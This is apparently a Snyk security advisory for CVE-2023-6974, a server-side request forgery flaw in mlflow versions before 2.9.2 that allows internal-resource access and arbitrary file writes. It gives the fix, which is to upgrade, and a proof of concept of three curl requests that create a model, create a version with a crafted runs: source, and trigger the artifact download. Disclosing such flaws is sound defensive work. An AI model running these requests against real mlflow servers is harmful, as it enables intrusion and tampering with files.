Server-Side Request Forgery (SSRF) Affecting mlflow package, versions [,2.9.2)
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.26% (67th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-MLFLOW-6134595
- published 21 Dec 2023
- disclosed 20 Dec 2023
- credit Mizu
Introduced: 20 Dec 2023
CVE-2023-6974 Open this link in a new tabHow to fix?
Upgrade mlflow to version 2.9.2 or higher.
Overview
mlflow is a platform to streamline machine learning development, including tracking experiments, packaging code into reproducible runs, and sharing and deploying models.
Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF) by exploiting the redirect behavior of the default HTTP protocol inside an http or runs: wrapper. An attacker can access internal resources and achieve arbitrary file writes by triggering the _download_file() function in HttpArtifactRepository.
PoC
- Create a model:
curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/registered-models/create'
- Create a model version:
curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc", "source": "runs:/b0895f2dd7cc4e56aa132acd2b47fe41/a"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/model-versions/create'
- Trigger a download of the payload:
curl 'http://127.0.0.1:5000/model-versions/get-artifact?path=whatever&name=poc&version=1'
References
CVSS Scores
version 3.1